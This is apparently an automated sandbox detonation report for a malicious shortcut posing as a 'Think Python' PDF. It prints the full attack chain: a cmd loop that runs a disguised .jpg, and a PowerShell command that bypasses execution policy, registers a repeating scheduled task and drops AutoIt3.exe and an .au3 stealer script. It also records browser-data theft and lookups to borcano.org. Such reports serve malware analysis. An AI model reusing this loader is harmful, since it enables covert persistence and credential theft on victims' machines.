Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe

"C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe"

Network

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-06-12 05:58

Reported

2024-06-12 06:00

Platform

win7-20240220-en

Max time kernel

122s

Max time network

123s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\A-Think Python How to Think Like a Computer Scientist, 3rd Edition (True PDF).lnk"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\A-Think Python How to Think Like a Computer Scientist, 3rd Edition (True PDF).lnk"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c for /f "tokens=*" %i in ('dir /b MyCover4.jpg') do @for /f "delims=" %j in (%i) do @%j

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c dir /b MyCover4.jpg

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -noprofile -noninteractive -ExecutionPolicy Bypass sleep 2 ; try{$Lq546qzs = New-Object -ComObject Schedule.Service ; $Plqkjsd ="(Get-CimInstance -ClassName Win32_DiskDrive).Size | Measure-Object -Sum | Select-Object -ExpandProperty Sum"; $Lq546qzs.Connect() ; $MASK = $Lq546qzs.NewTask(0) ; $reginfo = $MASK.RegistrationInfo ;$reginfo.Description = '' ; $reginfo.Author = '' ; $iosdfiu5s = $MASK.Principal; $iosdfiu5s.LogonType = 3 ; $esf5s = $MASK.settings ; $esf5s.Enabled = $true ; $esf5s.StartWhenAvailable = $true ; $esf5s.Hidden = $false ; $esf5s.DisallowStartIfOnBatteries = $false ; $esf5s.StopIfGoingOnBatteries = $false ; $esf5s.MultipleInstances = 2 ; $esf5s.ExecutionTimeLimit = """PT0H""" ; $sqdf = $MASK.Triggers.Create(9); $sqdf.Enabled = $true; $sqdf.Id = """LogonTriggerId"""; $sqdf.Repetition.Interval = """PT5M"""; $sqdf.Repetition.StopAtDurationEnd = $false; $activationTime = (Get-Date).AddMinutes(3); $sqdf.StartBoundary = $activationTime.ToString('yyyy-MM-ddTHH:mm:ss'); $currentUser = [System.Security.Principal.WindowsIdentity]::GetCurrent(); $sqdf.UserId = $currentUser.Name; $poqsdjkpoqj5qs5=$MASK.Triggers.Create(2) ; $poqsdjkpoqj5qs5.Enabled=$true ; $poqsdjkpoqj5qs5.Repetition.Interval="""PT10M""" ;$poqsdjkpoqj5qs5.Repetition.StopAtDurationEnd=$false ; $poqsdjkpoqj5qs5.Id="""DailyTriggerId""" ; $poqsdjkpoqj5qs5.StartBoundary = (Get-Date).AddMinutes(1).tostring('yyyy-MM-ddTHH:mm:ss'); $action_ = $MASK.Actions.Create(0) ; $action_.Path = '"""%appdata%\Microsoft\Windows\AutoIt3.exe"""' ; $action_.Arguments = '/ErrorStdOut """%appdata%\Microsoft\Windows\' + $Plqkjsd + '.au3""""'; $Lq546qzs.GetFolder("""\\""").RegisterTaskDefinition("""$Plqkjsd""", $MASK, 6 , $null, $null, 3) ;$Pllds = \"$env:APPDATA\Microsoft\Windows\"; Copy-Item MyCover2.jpeg \"$Pllds\$Plqkjsd.au3\"; Copy-Item MyCover3.jpeg \"$Pllds\AutoIt3.exe\" } Catch [System.Exception]{};"

C:\Windows\system32\attrib.exe

attrib -h -s /s /d

Network

N/A

Files

memory/2588-40-0x0000000002D00000-0x0000000002D80000-memory.dmp

memory/2588-41-0x000000001B640000-0x000000001B922000-memory.dmp

memory/2588-42-0x0000000002070000-0x0000000002078000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-06-12 05:58

Reported

2024-06-12 06:00

Platform

win10v2004-20240508-en

Max time kernel

142s

Max time network

147s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\A-Think Python How to Think Like a Computer Scientist, 3rd Edition (True PDF).lnk"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A

Reads user/profile data of web browsers

spyware stealer

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4960 wrote to memory of 2136 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\cmd.exe
PID 4960 wrote to memory of 2136 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\cmd.exe
PID 2136 wrote to memory of 3360 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 2136 wrote to memory of 3360 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 2136 wrote to memory of 2876 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 2876 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 3132 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\attrib.exe
PID 2136 wrote to memory of 3132 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\attrib.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\A-Think Python How to Think Like a Computer Scientist, 3rd Edition (True PDF).lnk"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c for /f "tokens=*" %i in ('dir /b MyCover4.jpg') do @for /f "delims=" %j in (%i) do @%j

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c dir /b MyCover4.jpg

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -noprofile -noninteractive -ExecutionPolicy Bypass sleep 2 ; try{$Lq546qzs = New-Object -ComObject Schedule.Service ; $Plqkjsd ="(Get-CimInstance -ClassName Win32_DiskDrive).Size | Measure-Object -Sum | Select-Object -ExpandProperty Sum"; $Lq546qzs.Connect() ; $MASK = $Lq546qzs.NewTask(0) ; $reginfo = $MASK.RegistrationInfo ;$reginfo.Description = '' ; $reginfo.Author = '' ; $iosdfiu5s = $MASK.Principal; $iosdfiu5s.LogonType = 3 ; $esf5s = $MASK.settings ; $esf5s.Enabled = $true ; $esf5s.StartWhenAvailable = $true ; $esf5s.Hidden = $false ; $esf5s.DisallowStartIfOnBatteries = $false ; $esf5s.StopIfGoingOnBatteries = $false ; $esf5s.MultipleInstances = 2 ; $esf5s.ExecutionTimeLimit = """PT0H""" ; $sqdf = $MASK.Triggers.Create(9); $sqdf.Enabled = $true; $sqdf.Id = """LogonTriggerId"""; $sqdf.Repetition.Interval = """PT5M"""; $sqdf.Repetition.StopAtDurationEnd = $false; $activationTime = (Get-Date).AddMinutes(3); $sqdf.StartBoundary = $activationTime.ToString('yyyy-MM-ddTHH:mm:ss'); $currentUser = [System.Security.Principal.WindowsIdentity]::GetCurrent(); $sqdf.UserId = $currentUser.Name; $poqsdjkpoqj5qs5=$MASK.Triggers.Create(2) ; $poqsdjkpoqj5qs5.Enabled=$true ; $poqsdjkpoqj5qs5.Repetition.Interval="""PT10M""" ;$poqsdjkpoqj5qs5.Repetition.StopAtDurationEnd=$false ; $poqsdjkpoqj5qs5.Id="""DailyTriggerId""" ; $poqsdjkpoqj5qs5.StartBoundary = (Get-Date).AddMinutes(1).tostring('yyyy-MM-ddTHH:mm:ss'); $action_ = $MASK.Actions.Create(0) ; $action_.Path = '"""%appdata%\Microsoft\Windows\AutoIt3.exe"""' ; $action_.Arguments = '/ErrorStdOut """%appdata%\Microsoft\Windows\' + $Plqkjsd + '.au3""""'; $Lq546qzs.GetFolder("""\\""").RegisterTaskDefinition("""$Plqkjsd""", $MASK, 6 , $null, $null, 3) ;$Pllds = \"$env:APPDATA\Microsoft\Windows\"; Copy-Item MyCover2.jpeg \"$Pllds\$Plqkjsd.au3\"; Copy-Item MyCover3.jpeg \"$Pllds\AutoIt3.exe\" } Catch [System.Exception]{};"

C:\Windows\system32\attrib.exe

attrib -h -s /s /d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe /ErrorStdOut "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\274872407040.au3"

Network

Country Destination Domain Proto
US 8.8.8.8:53 borcano.org udp
US 8.8.8.8:53 borcano.org udp
US 8.8.8.8:53 borcano.org udp
US 8.8.8.8:53 borcano.org udp
US 8.8.8.8:53 borcano.org udp
US 8.8.8.8:53 borcano.org udp

Files

memory/2876-0-0x00007FFEFAD13000-0x00007FFEFAD15000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_izy40021.fnr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2876-8-0x000002B0EA990000-0x000002B0EA9B2000-memory.dmp

memory/2876-11-0x00007FFEFAD10000-0x00007FFEFB7D1000-memory.dmp

memory/2876-12-0x00007FFEFAD10000-0x00007FFEFB7D1000-memory.dmp

memory/2876-13-0x000002B0ECB80000-0x000002B0ECBAA000-memory.dmp

memory/2876-14-0x000002B0ECB80000-0x000002B0ECBA4000-memory.dmp

memory/2876-15-0x00007FFEFAD10000-0x00007FFEFB7D1000-memory.dmp

memory/2876-20-0x00007FFEFAD10000-0x00007FFEFB7D1000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe

MD5 0adb9b817f1df7807576c2d7068dd931
SHA1 4a1b94a9a5113106f40cd8ea724703734d15f118
SHA256 98e4f904f7de1644e519d09371b8afcbbf40ff3bd56d76ce4df48479a4ab884b
SHA512 883aa88f2dba4214bb534fbdaf69712127357a3d0f5666667525db3c1fa351598f067068dfc9e7c7a45fed4248d7dca729ba4f75764341e47048429f9ca8846a

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\274872407040.au3

MD5 fa26096b95742e002aaa28f5add10d15
SHA1 27411586e4b2082750df480d9725c535f86b8f4c
SHA256 dce814637339057cd26d594d6b1dafad71f805d596f4c0dd3d6707136a7e4eaf
SHA512 2699af7e5435fc7b8e4b774690592f499f43a5420a005c2379ee343e038d4a5b723f0912ea1e3c03c1670ef01582ff90198010adfcf0cb263ee3115c1c75f57f

memory/1648-23-0x0000000008C30000-0x0000000009258000-memory.dmp

memory/1648-33-0x0000000009FC0000-0x0000000009FDA000-memory.dmp

memory/1648-34-0x000000000A020000-0x000000000A056000-memory.dmp

memory/1648-35-0x000000000A6E0000-0x000000000AD5A000-memory.dmp

memory/1648-36-0x000000000A100000-0x000000000A196000-memory.dmp

memory/1648-37-0x000000000A090000-0x000000000A0B2000-memory.dmp

memory/1648-38-0x000000000A210000-0x000000000A276000-memory.dmp

memory/1648-39-0x000000000B310000-0x000000000B8B4000-memory.dmp

memory/1648-40-0x000000000A1C0000-0x000000000A1DE000-memory.dmp

memory/1648-41-0x000000000A2D0000-0x000000000A31A000-memory.dmp

memory/1648-42-0x000000000BCC0000-0x000000000C014000-memory.dmp

memory/1648-43-0x000000000A510000-0x000000000A576000-memory.dmp

memory/1648-44-0x000000000A5B0000-0x000000000A5D2000-memory.dmp

memory/1648-45-0x000000000B170000-0x000000000B1BC000-memory.dmp

memory/1648-46-0x000000000CE00000-0x000000000CFC2000-memory.dmp

memory/1648-47-0x000000000D500000-0x000000000DA2C000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-12 05:58

Reported

2024-06-12 06:00

Platform

win7-20240508-en

Max time kernel

118s

Max time network

119s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\ExtractAll\A-Think Python How to Think Like a Computer Scientist, 3rd Edition (True PDF).lnk"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\ExtractAll\A-Think Python How to Think Like a Computer Scientist, 3rd Edition (True PDF).lnk"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c for /f "tokens=*" %i in ('dir /b MyCover4.jpg') do @for /f "delims=" %j in (%i) do @%j

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c dir /b MyCover4.jpg

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -noprofile -noninteractive -ExecutionPolicy Bypass sleep 2 ; try{$Lq546qzs = New-Object -ComObject Schedule.Service ; $Plqkjsd ="(Get-CimInstance -ClassName Win32_DiskDrive).Size | Measure-Object -Sum | Select-Object -ExpandProperty Sum"; $Lq546qzs.Connect() ; $MASK = $Lq546qzs.NewTask(0) ; $reginfo = $MASK.RegistrationInfo ;$reginfo.Description = '' ; $reginfo.Author = '' ; $iosdfiu5s = $MASK.Principal; $iosdfiu5s.LogonType = 3 ; $esf5s = $MASK.settings ; $esf5s.Enabled = $true ; $esf5s.StartWhenAvailable = $true ; $esf5s.Hidden = $false ; $esf5s.DisallowStartIfOnBatteries = $false ; $esf5s.StopIfGoingOnBatteries = $false ; $esf5s.MultipleInstances = 2 ; $esf5s.ExecutionTimeLimit = """PT0H""" ; $sqdf = $MASK.Triggers.Create(9); $sqdf.Enabled = $true; $sqdf.Id = """LogonTriggerId"""; $sqdf.Repetition.Interval = """PT5M"""; $sqdf.Repetition.StopAtDurationEnd = $false; $activationTime = (Get-Date).AddMinutes(3); $sqdf.StartBoundary = $activationTime.ToString('yyyy-MM-ddTHH:mm:ss'); $currentUser = [System.Security.Principal.WindowsIdentity]::GetCurrent(); $sqdf.UserId = $currentUser.Name; $poqsdjkpoqj5qs5=$MASK.Triggers.Create(2) ; $poqsdjkpoqj5qs5.Enabled=$true ; $poqsdjkpoqj5qs5.Repetition.Interval="""PT10M""" ;$poqsdjkpoqj5qs5.Repetition.StopAtDurationEnd=$false ; $poqsdjkpoqj5qs5.Id="""DailyTriggerId""" ; $poqsdjkpoqj5qs5.StartBoundary = (Get-Date).AddMinutes(1).tostring('yyyy-MM-ddTHH:mm:ss'); $action_ = $MASK.Actions.Create(0) ; $action_.Path = '"""%appdata%\Microsoft\Windows\AutoIt3.exe"""' ; $action_.Arguments = '/ErrorStdOut """%appdata%\Microsoft\Windows\' + $Plqkjsd + '.au3""""'; $Lq546qzs.GetFolder("""\\""").RegisterTaskDefinition("""$Plqkjsd""", $MASK, 6 , $null, $null, 3) ;$Pllds = \"$env:APPDATA\Microsoft\Windows\"; Copy-Item MyCover2.jpeg \"$Pllds\$Plqkjsd.au3\"; Copy-Item MyCover3.jpeg \"$Pllds\AutoIt3.exe\" } Catch [System.Exception]{};"

C:\Windows\system32\attrib.exe

attrib -h -s /s /d

Network

N/A

Files

memory/2668-40-0x0000000002A50000-0x0000000002AD0000-memory.dmp

memory/2668-41-0x000000001B610000-0x000000001B8F2000-memory.dmp

memory/2668-42-0x00000000027A0000-0x00000000027A8000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-12 05:58

Reported

2024-06-12 06:00

Platform

win10v2004-20240611-en

Max time kernel

150s

Max time network

150s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\ExtractAll\A-Think Python How to Think Like a Computer Scientist, 3rd Edition (True PDF).lnk"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A

Reads user/profile data of web browsers

spyware stealer

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\ExtractAll\A-Think Python How to Think Like a Computer Scientist, 3rd Edition (True PDF).lnk"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c for /f "tokens=*" %i in ('dir /b MyCover4.jpg') do @for /f "delims=" %j in (%i) do @%j

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c dir /b MyCover4.jpg

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -noprofile -noninteractive -ExecutionPolicy Bypass sleep 2 ; try{$Lq546qzs = New-Object -ComObject Schedule.Service ; $Plqkjsd ="(Get-CimInstance -ClassName Win32_DiskDrive).Size | Measure-Object -Sum | Select-Object -ExpandProperty Sum"; $Lq546qzs.Connect() ; $MASK = $Lq546qzs.NewTask(0) ; $reginfo = $MASK.RegistrationInfo ;$reginfo.Description = '' ; $reginfo.Author = '' ; $iosdfiu5s = $MASK.Principal; $iosdfiu5s.LogonType = 3 ; $esf5s = $MASK.settings ; $esf5s.Enabled = $true ; $esf5s.StartWhenAvailable = $true ; $esf5s.Hidden = $false ; $esf5s.DisallowStartIfOnBatteries = $false ; $esf5s.StopIfGoingOnBatteries = $false ; $esf5s.MultipleInstances = 2 ; $esf5s.ExecutionTimeLimit = """PT0H""" ; $sqdf = $MASK.Triggers.Create(9); $sqdf.Enabled = $true; $sqdf.Id = """LogonTriggerId"""; $sqdf.Repetition.Interval = """PT5M"""; $sqdf.Repetition.StopAtDurationEnd = $false; $activationTime = (Get-Date).AddMinutes(3); $sqdf.StartBoundary = $activationTime.ToString('yyyy-MM-ddTHH:mm:ss'); $currentUser = [System.Security.Principal.WindowsIdentity]::GetCurrent(); $sqdf.UserId = $currentUser.Name; $poqsdjkpoqj5qs5=$MASK.Triggers.Create(2) ; $poqsdjkpoqj5qs5.Enabled=$true ; $poqsdjkpoqj5qs5.Repetition.Interval="""PT10M""" ;$poqsdjkpoqj5qs5.Repetition.StopAtDurationEnd=$false ; $poqsdjkpoqj5qs5.Id="""DailyTriggerId""" ; $poqsdjkpoqj5qs5.StartBoundary = (Get-Date).AddMinutes(1).tostring('yyyy-MM-ddTHH:mm:ss'); $action_ = $MASK.Actions.Create(0) ; $action_.Path = '"""%appdata%\Microsoft\Windows\AutoIt3.exe"""' ; $action_.Arguments = '/ErrorStdOut """%appdata%\Microsoft\Windows\' + $Plqkjsd + '.au3""""'; $Lq546qzs.GetFolder("""\\""").RegisterTaskDefinition("""$Plqkjsd""", $MASK, 6 , $null, $null, 3) ;$Pllds = \"$env:APPDATA\Microsoft\Windows\"; Copy-Item MyCover2.jpeg 